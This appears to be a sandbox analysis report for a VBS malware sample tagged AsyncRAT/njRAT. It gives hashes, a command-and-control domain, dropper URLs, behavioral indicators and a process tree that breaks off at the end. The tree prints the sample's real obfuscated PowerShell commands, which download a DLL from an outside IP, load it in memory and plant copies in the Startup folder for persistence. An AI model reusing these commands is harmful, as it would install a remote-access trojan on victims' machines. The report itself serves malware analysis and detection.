asyncrat | 2a196da9c5e2dcf30d7eb90464a4296bc1f0046958836157c07ab4782e5af108

Analysis

max time kernel
149s
max time network
149s
platform
windows10_x64
resource
win10-en-20211208
submitted
17-12-2021 20:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9fb660eca8d9ed1038a8cffc032e59bb.vbs
Size

151KB
MD5

9fb660eca8d9ed1038a8cffc032e59bb
SHA1

4aff5b55b1b499cec665f46b132856a4a300b4e9
SHA256

2a196da9c5e2dcf30d7eb90464a4296bc1f0046958836157c07ab4782e5af108
SHA512

0bcb0de54a3bdbe9d0e2be1899ab05060a7db58ae6e53aeed82a54b99f126502e0366415e590f22909aa9531c272af8287c6d5f06ece31de21156bcc2ef81790

Score

10^/10

asyncrat njrat nyan cat rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

revg.duckdns.org:57831

Mutex

ebef4abe57d24e8

Attributes

reg_key
ebef4abe57d24e8
splitter
@!#&^%$

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3864-419-0x000000000040CBBE-mapping.dmp	asyncrat

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

16 2212 powershell.exe
30 1440 powershell.exe
31 3080 powershell.exe
32 3260 powershell.exe

flow	pid	process
16	2212	powershell.exe
30	1440	powershell.exe
31	3080	powershell.exe
32	3260	powershell.exe

Drops startup file 5 IoCs

Processes:

RegSvcs.exepowershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x2.vbs	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCR.vbs	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs	RegSvcs.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2212 set thread context of 3176	2212	powershell.exe	RegSvcs.exe
PID 3080 set thread context of 4084	3080	powershell.exe	RegSvcs.exe
PID 3260 set thread context of 3864	3260	powershell.exe	RegSvcs.exe
PID 1440 set thread context of 3376	1440	powershell.exe	RegSvcs.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

RegSvcs.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings RegSvcs.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

2584 PING.EXE
4020 PING.EXE
848 PING.EXE
2964 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings	RegSvcs.exe

pid	process
2584	PING.EXE
4020	PING.EXE
848	PING.EXE
2964	PING.EXE

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1464	powershell.exe
1464	powershell.exe
1464	powershell.exe
4000	powershell.exe
4000	powershell.exe
4000	powershell.exe
2212	powershell.exe
2212	powershell.exe
2212	powershell.exe
696	powershell.exe
3032	powershell.exe
712	powershell.exe
3032	powershell.exe
696	powershell.exe
712	powershell.exe
3032	powershell.exe
696	powershell.exe
712	powershell.exe
2784	powershell.exe
2456	powershell.exe
2500	powershell.exe
2456	powershell.exe
2784	powershell.exe
2500	powershell.exe
2784	powershell.exe
2456	powershell.exe
2500	powershell.exe
3080	powershell.exe
1440	powershell.exe
3260	powershell.exe
3080	powershell.exe
1440	powershell.exe
3080	powershell.exe
3260	powershell.exe
1440	powershell.exe
3260	powershell.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegSvcs.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRegSvcs.exeRegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	696	powershell.exe
Token: SeDebugPrivilege	712	powershell.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: SeDebugPrivilege	3864	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: SeDebugPrivilege	3376	RegSvcs.exe
Token: 33	3376	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3376	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe
Token: 33	3376	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3376	RegSvcs.exe
Token: 33	3176	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3176	RegSvcs.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.execmd.exepowershell.exepowershell.exeRegSvcs.exeWScript.exeWScript.exeWScript.execmd.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 3464 wrote to memory of 3228	3464	WScript.exe	cmd.exe
PID 3464 wrote to memory of 3228	3464	WScript.exe	cmd.exe
PID 3228 wrote to memory of 848	3228	cmd.exe	PING.EXE
PID 3228 wrote to memory of 848	3228	cmd.exe	PING.EXE
PID 3228 wrote to memory of 1464	3228	cmd.exe	powershell.exe
PID 3228 wrote to memory of 1464	3228	cmd.exe	powershell.exe
PID 3464 wrote to memory of 4000	3464	WScript.exe	powershell.exe
PID 3464 wrote to memory of 4000	3464	WScript.exe	powershell.exe
PID 4000 wrote to memory of 2212	4000	powershell.exe	powershell.exe
PID 4000 wrote to memory of 2212	4000	powershell.exe	powershell.exe
PID 2212 wrote to memory of 3176	2212	powershell.exe	RegSvcs.exe
PID 2212 wrote to memory of 3176	2212	powershell.exe	RegSvcs.exe
PID 2212 wrote to memory of 3176	2212	powershell.exe	RegSvcs.exe
PID 2212 wrote to memory of 3176	2212	powershell.exe	RegSvcs.exe
PID 2212 wrote to memory of 3176	2212	powershell.exe	RegSvcs.exe
PID 2212 wrote to memory of 3176	2212	powershell.exe	RegSvcs.exe
PID 2212 wrote to memory of 3176	2212	powershell.exe	RegSvcs.exe
PID 2212 wrote to memory of 3176	2212	powershell.exe	RegSvcs.exe
PID 3176 wrote to memory of 560	3176	RegSvcs.exe	WScript.exe
PID 3176 wrote to memory of 560	3176	RegSvcs.exe	WScript.exe
PID 3176 wrote to memory of 560	3176	RegSvcs.exe	WScript.exe
PID 3176 wrote to memory of 1476	3176	RegSvcs.exe	WScript.exe
PID 3176 wrote to memory of 1476	3176	RegSvcs.exe	WScript.exe
PID 3176 wrote to memory of 1476	3176	RegSvcs.exe	WScript.exe
PID 3176 wrote to memory of 1368	3176	RegSvcs.exe	WScript.exe
PID 3176 wrote to memory of 1368	3176	RegSvcs.exe	WScript.exe
PID 3176 wrote to memory of 1368	3176	RegSvcs.exe	WScript.exe
PID 1476 wrote to memory of 3928	1476	WScript.exe	cmd.exe
PID 1476 wrote to memory of 3928	1476	WScript.exe	cmd.exe
PID 1476 wrote to memory of 3928	1476	WScript.exe	cmd.exe
PID 560 wrote to memory of 1596	560	WScript.exe	cmd.exe
PID 560 wrote to memory of 1596	560	WScript.exe	cmd.exe
PID 560 wrote to memory of 1596	560	WScript.exe	cmd.exe
PID 1368 wrote to memory of 3228	1368	WScript.exe	cmd.exe
PID 1368 wrote to memory of 3228	1368	WScript.exe	cmd.exe
PID 1368 wrote to memory of 3228	1368	WScript.exe	cmd.exe
PID 3928 wrote to memory of 2584	3928	cmd.exe	PING.EXE
PID 3928 wrote to memory of 2584	3928	cmd.exe	PING.EXE
PID 3928 wrote to memory of 2584	3928	cmd.exe	PING.EXE
PID 1596 wrote to memory of 2964	1596	cmd.exe	PING.EXE
PID 1596 wrote to memory of 2964	1596	cmd.exe	PING.EXE
PID 1596 wrote to memory of 2964	1596	cmd.exe	PING.EXE
PID 3228 wrote to memory of 4020	3228	cmd.exe	PING.EXE
PID 3228 wrote to memory of 4020	3228	cmd.exe	PING.EXE
PID 3228 wrote to memory of 4020	3228	cmd.exe	PING.EXE
PID 1596 wrote to memory of 3032	1596	cmd.exe	powershell.exe
PID 3928 wrote to memory of 696	3928	cmd.exe	powershell.exe
PID 1596 wrote to memory of 3032	1596	cmd.exe	powershell.exe
PID 1596 wrote to memory of 3032	1596	cmd.exe	powershell.exe
PID 3928 wrote to memory of 696	3928	cmd.exe	powershell.exe
PID 3928 wrote to memory of 696	3928	cmd.exe	powershell.exe
PID 3228 wrote to memory of 712	3228	cmd.exe	powershell.exe
PID 3228 wrote to memory of 712	3228	cmd.exe	powershell.exe
PID 3228 wrote to memory of 712	3228	cmd.exe	powershell.exe
PID 1368 wrote to memory of 2456	1368	WScript.exe	powershell.exe
PID 1368 wrote to memory of 2456	1368	WScript.exe	powershell.exe
PID 1368 wrote to memory of 2456	1368	WScript.exe	powershell.exe
PID 560 wrote to memory of 2500	560	WScript.exe	powershell.exe
PID 560 wrote to memory of 2500	560	WScript.exe	powershell.exe
PID 560 wrote to memory of 2500	560	WScript.exe	powershell.exe
PID 1476 wrote to memory of 2784	1476	WScript.exe	powershell.exe
PID 1476 wrote to memory of 2784	1476	WScript.exe	powershell.exe
PID 1476 wrote to memory of 2784	1476	WScript.exe	powershell.exe
PID 2784 wrote to memory of 3080	2784	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:3228

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Drops startup file
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3176

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCR.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DCR.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ TWU.vbs')
6⤵
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
7⤵
- Runs ping.exe
PID:2964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DCR.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ TWU.vbs')
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙FI☙QwBE☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.RCD/tset/94.91.142.19//:ptth'))"
7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3864

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\update.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ KFE.vbs')
6⤵
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
7⤵
- Runs ping.exe
PID:2584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\update.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ KFE.vbs')
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3080

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
8⤵
PID:4084

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x2.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x2.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ WJK.vbs')
6⤵
- Suspicious use of WriteProcessMemory
PID:3228

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
7⤵
- Runs ping.exe
PID:4020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x2.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ WJK.vbs')
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 